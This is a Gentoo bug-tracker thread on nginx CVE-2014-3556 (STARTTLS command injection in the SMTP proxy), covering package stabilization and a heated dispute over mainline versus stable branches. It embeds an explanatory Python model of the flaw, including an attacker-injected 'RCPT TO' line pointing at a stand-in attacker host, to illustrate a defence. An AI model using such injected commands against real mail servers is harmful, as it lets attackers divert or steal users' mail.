Bug 519174 (CVE-2014-3556) - <www-servers/nginx-1.7.4: STARTTLS injection in smtp (CVE-2014-3556)
Summary: <www-servers/nginx-1.7.4: STARTTLS injection in smtp (CVE-2014-3556)
Status: RESOLVED FIXED
Alias: CVE-2014-3556
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All
OS: Linux
Importance: Normal minor
Assignee: Gentoo Security
URL: http://mailman.nginx.org/pipermail/ng...
Whiteboard: B3 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2014-08-06 02:42 UTC by Johan Bergström
Modified: 2014-08-15 21:44 UTC
CC List: 5 users

See Also:
Package list:
Runtime testing required: ---


Description Johan Bergström 2014-08-06 02:42:34 UTC
A bug in nginx SMTP proxy was found, which allows an attacker in a
privileged network position to inject commands into SSL sessions started
with the STARTTLS command, potentially making it possible to steal
sensitive information sent by clients (CVE-2014-3556).

The problem affects nginx 1.5.6 - 1.7.3.

The problem is fixed in nginx 1.7.4, 1.6.1.


We don't have the 1.6.x series in tree, but this applies to our 1.5.13 as well. This puts us in a situation where we'd want to STABLEREQ 1.7.4 once this hits tree, which isn't optimal. I'll talk with the rest of the nginx maintainers about what to do as soon as we have ebuilds in tree.

You can find ebuilds to review for these versions in our nginx-overlay: github.com/gentoo/nginx-overlay
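The injection the advisory describes is the STARTTLS plaintext-injection pattern: a server reads the client's STARTTLS line together with whatever bytes follow it in the same read, performs the TLS handshake, and then keeps processing the leftover plaintext from its input buffer as though the now-authenticated client had sent it over TLS. An on-path attacker who can append bytes after the client's STARTTLS therefore gets commands executed inside the encrypted session. The model below is an added illustration of that class, written for this page; it is not nginx's mail module code, it does not reproduce the 1.7.4 fix, and the sample SMTP traffic, the attacker's injected line and the rejection check are constructed assumptions. The "discard the buffer" behaviour it shows is what RFC 3207 §4.2 requires (each side discards knowledge obtained before TLS).

```python
"""Model of STARTTLS plaintext command injection (added example, not nginx code).

Simulates a mail proxy's command loop.  The vulnerable variant keeps the
bytes that were already buffered behind the STARTTLS line and processes
them after the "handshake" as if they had arrived over TLS; the hardened
variant discards the buffer at the transition, as RFC 3207 section 4.2 requires.
"""
import base64

# Constructed sample traffic; none of it comes from the bug report or from nginx.
CLIENT_PLAIN = b"EHLO client.example\r\nSTARTTLS\r\n"
# Appended on the wire, in the clear, by an on-path attacker (assumed attacker input).
ATTACKER_INJECT = b"RCPT TO:<attacker@attacker.example>\r\n"
# What the genuine client sends once the TLS channel is up.
CLIENT_TLS = (b"EHLO client.example\r\n"
              b"AUTH PLAIN " + base64.b64encode(b"\0alice\0secret") + b"\r\n"
              b"MAIL FROM:<alice@client.example>\r\n")


def run_proxy(first_read, tls_data, discard_on_starttls):
    """Simulate the proxy's command loop and return [(line, channel)].

    first_read: bytes the pre-handshake socket read returns (the client's
                STARTTLS plus anything an attacker pipelined behind it).
    tls_data:   decrypted bytes the genuine client sends after the handshake.
    channel is "plain" or "tls": where the proxy *believes* the line came from.
    """
    buf = bytearray(first_read)
    in_tls = False
    pending_tls = tls_data
    log = []
    while True:
        nl = buf.find(b"\r\n")
        if nl < 0:
            if in_tls and pending_tls is not None:
                buf += pending_tls          # bytes arriving over the TLS channel
                pending_tls = None
                continue
            break
        line = bytes(buf[:nl])
        del buf[:nl + 2]
        verb = line.split(b" ", 1)[0].upper()
        if verb == b"STARTTLS" and not in_tls:
            log.append((line, "plain"))
            in_tls = True                   # a real server runs the handshake here
            if discard_on_starttls:
                buf.clear()                 # RFC 3207 s4.2: forget all pre-TLS input
            continue
        log.append((line, "tls" if in_tls else "plain"))
    return log


def tls_commands(log):
    """Lines the proxy attributed to the TLS session, in execution order."""
    return [line for line, channel in log if channel == "tls"]


def pipelined_after_starttls(first_read):
    """Bytes that arrived in the same read as STARTTLS but after it.

    An RFC 3207 client never sends these, so a proxy may reject the session
    (or at least drop the bytes) whenever this is non-empty.  Assumed check,
    not a claim about what nginx does.
    """
    marker = first_read.upper().find(b"STARTTLS\r\n")
    if marker < 0:
        return b""
    return first_read[marker + len(b"STARTTLS\r\n"):]


if __name__ == "__main__":
    wire = CLIENT_PLAIN + ATTACKER_INJECT
    print("pipelined after STARTTLS:", pipelined_after_starttls(wire))
    for discard in (False, True):
        print("discard buffer after STARTTLS:", discard)
        for line, channel in run_proxy(wire, CLIENT_TLS, discard):
            print(f"  [{channel:5}] {line.decode()}")
```

With `discard_on_starttls=False` the attacker's `RCPT TO` is the first command the proxy executes "inside" TLS, ahead of the client's own EHLO and AUTH; with it set to `True` only the client's post-handshake lines appear on the TLS channel, and the two variants behave identically for a client that does not pipeline behind STARTTLS. What an attacker can achieve with an injected command depends on the proxy's SMTP state machine, which this model does not enforce; the bug report's claim is that sensitive client data could be stolen.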
Comment 1 Agostino Sarubbo gentoo-dev 2014-08-06 07:41:00 UTC
Thanks for the report
Comment 2 Tiziano Müller (RETIRED) gentoo-dev 2014-08-08 09:46:55 UTC
ok, nginx-1.7.4 is ready for stabilization.
ppc had nginx-1.7.2 keyworded (and has a stable keyword for earlier versions), but the keywords got dropped since luajit is not keyworded. I would recommend masking the luajit USE flag for now so that ppc can get a stable nginx as well.
Comment 3 Agostino Sarubbo gentoo-dev 2014-08-10 08:12:31 UTC
Arches, please test and mark stable:
=www-servers/nginx-1.7.4
Target keywords : "amd64 x86"
Comment 4 Agostino Sarubbo gentoo-dev 2014-08-10 09:01:24 UTC
amd64 stable
Comment 5 Agostino Sarubbo gentoo-dev 2014-08-10 09:01:40 UTC
x86 stable.

Maintainer(s), please cleanup.
Security, please vote.
Comment 6 Agostino Sarubbo gentoo-dev 2014-08-10 13:22:38 UTC
cleanup done.
Comment 7 Alexander Tsoy 2014-08-11 10:50:12 UTC
IIRC only versions from stable branches were stabilized in gentoo in the past. So why 1.7.4 instead of 1.6.1 (not even in the tree)?
Comment 8 Johan Bergström 2014-08-12 07:10:30 UTC
(In reply to Alexander Tsoy from comment #7)
> IIRC only versions from stable branches was stabilized in gentoo in the
> past. So why 1.7.4 instead of 1.6.1 (not even in the tree)?

We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream recommends to use the mainline series[1].

You can read more about rationale and get additional versions in our overlay, found here[2] 

[1]: http://nginx.com/blog/nginx-1-6-1-7-released/
[2]: https://github.com/gentoo/nginx-overlay
Comment 9 Stanislav Romanov 2014-08-12 13:27:44 UTC
(In reply to Johan Bergström from comment #8)
> We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream
> recommends to use the mainline series[1].

Upstream recommends to use the mainline for developers, but not for end-users. For non-developers upstream recommends to use stable 1.6 or even nginx+.
So, feel free to develop any version you want, but bring back stable nginx to portage, please.
Comment 10 Tiziano Müller (RETIRED) gentoo-dev 2014-08-13 08:46:43 UTC
(In reply to Lunacharsky from comment #9)
> (In reply to Johan Bergström from comment #8)
> > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream
> > recommends to use the mainline series[1].
> 
> Upstream recommends to use the mainline for developers, but not for
> end-users. For non-developers upstream recommends to use stable 1.6 or even
> nginx+
> So, feel free to develop any version you want, but bring back stable nginx
> to portage, please.

Can you back this claim somehow? Because link [1] clearly suggests something else:

"Note that stable does not mean ‘more reliable or more bug-free’. In fact, mainline is generally regarded as more reliable because only critical fixes are merged to stable."
Comment 11 Tiziano Müller (RETIRED) gentoo-dev 2014-08-13 08:49:01 UTC
(In reply to Tiziano Müller from comment #10)
> (In reply to Lunacharsky from comment #9)
> > (In reply to Johan Bergström from comment #8)
> > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream
> > > recommends to use the mainline series[1].
> > 
> > Upstream recommends to use the mainline for developers, but not for
> > end-users. For non-developers upstream recommends to use stable 1.6 or even
> > nginx+
> > So, feel free to develop any version you want, but bring back stable nginx
> > to portage, please.
> 
> Can you back this claim somehow? Because link [1] clearly suggests something
> else:
> 
> "Note that stable does not mean ‘more reliable or more bug-free’. In fact,
> mainline is generally regarded as more reliable because only critical fixes
> are merged to stable."

and: "NGINX Plus tracks the mainline version of NGINX"
Comment 12 Stanislav Romanov 2014-08-13 10:33:55 UTC
(In reply to Tiziano Müller from comment #10)
> (In reply to Lunacharsky from comment #9)
> > (In reply to Johan Bergström from comment #8)
> > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream
> > > recommends to use the mainline series[1].
> > 
> > Upstream recommends to use the mainline for developers, but not for
> > end-users. For non-developers upstream recommends to use stable 1.6 or even
> > nginx+
> > So, feel free to develop any version you want, but bring back stable nginx
> > to portage, please.
> 
> Can you back this claim somehow? Because link [1] clearly suggests something
> else:
> 
> "Note that stable does not mean ‘more reliable or more bug-free’. In fact,
> mainline is generally regarded as more reliable because only critical fixes
> are merged to stable."

Link [1] is for developers, who compile every day ) But that link is not for end-users, who compile if and when it is really needed.
Since release of 1.6 and 1.7:
1.6 must be reinstalled 1 time - 1.6.1 now
1.7 must be reinstalled 4 times - 1.7.4 now
1.6 - is more suitable for production purposes.
But, as I can see, you don't think about users who use gentoo and nginx in production.

> and: "NGINX Plus tracks the mainline version of NGINX"
Yes, it is. But it is released less often than mainline. The stable version of Nginx also tracks the mainline, and is also released less often. Because of the similar idea of stable and nginx+ - use in production.

So, feel free to develop any version you want, but bring back stable nginx to portage, please.
Comment 13 Johan Bergström 2014-08-13 12:40:28 UTC
(In reply to Lunacharsky from comment #12)
> (In reply to Tiziano Müller from comment #10)
> > (In reply to Lunacharsky from comment #9)
> > > (In reply to Johan Bergström from comment #8)
> > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream
> > > > recommends to use the mainline series[1].
> > > 
> > > Upstream recommends to use the mainline for developers, but not for
> > > end-users. For non-developers upstream recommends to use stable 1.6 or even
> > > nginx+
> > > So, feel free to develop any version you want, but bring back stable nginx
> > > to portage, please.
> > 
> > Can you back this claim somehow? Because link [1] clearly suggests something
> > else:
> > 
> > "Note that stable does not mean ‘more reliable or more bug-free’. In fact,
> > mainline is generally regarded as more reliable because only critical fixes
> > are merged to stable."
> 
> Link [1] is for developers, who compile every day ) But that link is not for
> end-users, who compile if and when it is really needed.
> Since release of 1.6 and 1.7:
> 1.6 must be reinstalled 1 time - 1.6.1 now
> 1.7 must be reinstalled 4 times - 1.7.4 now
> 1.6 - is more suitable for production purposes.
> But, as I can see, you don't think about users who use gentoo and nginx in
> production.
> 
> > and: "NGINX Plus tracks the mainline version of NGINX"
> Yes, it is. But it is released less often than mainline. The stable version of
> Nginx also tracks the mainline, and is also released less often. Because of the
> similar idea of stable and nginx+ - use in production.
> 
> So, feel free to develop any version you want, but bring back stable nginx
> to portage, please.

Here's a quote from that blog post:
Which version should I use?
In general, you should deploy the NGINX mainline branch at all times. 

That's clear enough to me.
Comment 14 Stanislav Romanov 2014-08-13 13:39:22 UTC
(In reply to Johan Bergström from comment #13)
> (In reply to Lunacharsky from comment #12)
> > (In reply to Tiziano Müller from comment #10)
> > > (In reply to Lunacharsky from comment #9)
> > > > (In reply to Johan Bergström from comment #8)
> > > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream
> > > > > recommends to use the mainline series[1].
> > > > 
> > > > Upstream recommends to use the mainline for developers, but not for
> > > > end-users. For non-developers upstream recommends to use stable 1.6 or even
> > > > nginx+
> > > > So, feel free to develop any version you want, but bring back stable nginx
> > > > to portage, please.
> > > 
> > > Can you back this claim somehow? Because link [1] clearly suggests something
> > > else:
> > > 
> > > "Note that stable does not mean ‘more reliable or more bug-free’. In fact,
> > > mainline is generally regarded as more reliable because only critical fixes
> > > are merged to stable."
> > 
> > Link [1] is for developers, who compile every day ) But that link is not for
> > end-users, who compile if and when it is really needed.
> > Since release of 1.6 and 1.7:
> > 1.6 must be reinstalled 1 time - 1.6.1 now
> > 1.7 must be reinstalled 4 times - 1.7.4 now
> > 1.6 - is more suitable for production purposes.
> > But, as I can see, you don't think about users who use gentoo and nginx in
> > production.
> > 
> > > and: "NGINX Plus tracks the mainline version of NGINX"
> > Yes, it is. But it is released less often than mainline. The stable version of
> > Nginx also tracks the mainline, and is also released less often. Because of the
> > similar idea of stable and nginx+ - use in production.
> > 
> > So, feel free to develop any version you want, but bring back stable nginx
> > to portage, please.
> 
> Here's a quote from that blog post:
> Which version should I use?
> In general, you should deploy the NGINX mainline branch at all times. 
> 
> That's clear enough to me.

Nginx Inc. needs free testers for the mainline branch. That's why they wrote that blog post. If you are an employee of Nginx Inc. then you have to believe in corporate blog posts and don't care about gentoo users.

Bring back stable nginx to portage, please.
Comment 15 Johan Bergström 2014-08-13 23:30:07 UTC
(In reply to Lunacharsky from comment #14)
> (In reply to Johan Bergström from comment #13)
> > (In reply to Lunacharsky from comment #12)
> > > (In reply to Tiziano Müller from comment #10)
> > > > (In reply to Lunacharsky from comment #9)
> > > > > (In reply to Johan Bergström from comment #8)
> > > > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream
> > > > > > recommends to use the mainline series[1].
> > > > > 
> > > > > Upstream recommends to use the mainline for developers, but not for
> > > > > end-users. For non-developers upstream recommends to use stable 1.6 or even
> > > > > nginx+
> > > > > So, feel free to develop any version you want, but bring back stable nginx
> > > > > to portage, please.
> > > > 
> > > > Can you back this claim somehow? Because link [1] clearly suggests something
> > > > else:
> > > > 
> > > > "Note that stable does not mean ‘more reliable or more bug-free’. In fact,
> > > > mainline is generally regarded as more reliable because only critical fixes
> > > > are merged to stable."
> > > 
> > > Link [1] is for developers, who compile every day ) But that link is not for
> > > end-users, who compile if and when it is really needed.
> > > Since release of 1.6 and 1.7:
> > > 1.6 must be reinstalled 1 time - 1.6.1 now
> > > 1.7 must be reinstalled 4 times - 1.7.4 now
> > > 1.6 - is more suitable for production purposes.
> > > But, as I can see, you don't think about users who use gentoo and nginx in
> > > production.
> > > 
> > > > and: "NGINX Plus tracks the mainline version of NGINX"
> > > Yes, it is. But it is released less often than mainline. The stable version of
> > > Nginx also tracks the mainline, and is also released less often. Because of the
> > > similar idea of stable and nginx+ - use in production.
> > > 
> > > So, feel free to develop any version you want, but bring back stable nginx
> > > to portage, please.
> > 
> > Here's a quote from that blog post:
> > Which version should I use?
> > In general, you should deploy the NGINX mainline branch at all times. 
> > 
> > That's clear enough to me.
> 
> Nginx Inc. needs free testers for the mainline branch. That's why they wrote
> that blog post. If you are an employee of Nginx Inc. then you have to believe
> in corporate blog posts and don't care about gentoo users.
> 
> Bring back stable nginx to portage, please.

We're not going to change this. We don't ignore opinions like yours, which is why we offer most nginx branches in an overlay. If you want to discuss further, ping me (jbergstroem) at freenode. Otherwise, please let this security bug be a security bug and not opinion.
Comment 16 Stanislav Romanov 2014-08-14 08:18:24 UTC
(In reply to Johan Bergström from comment #15)
> We're not going to change this.
Yes, I know, non-smart people never change decisions.

> please let this security bug be a security bug
We will get a lot of security bugs in the unstable 1.7 branch, because of you.
Comment 17 Sergey Popov gentoo-dev 2014-08-14 08:58:48 UTC
Thanks for your work, guys.

GLSA vote: no
Comment 18 Yury German Gentoo Infrastructure gentoo-dev 2014-08-15 21:44:15 UTC
Arches and Maintainer(s), Thank you for your work.

GLSA Vote: No
No GLSA - Closing Bug as Resolved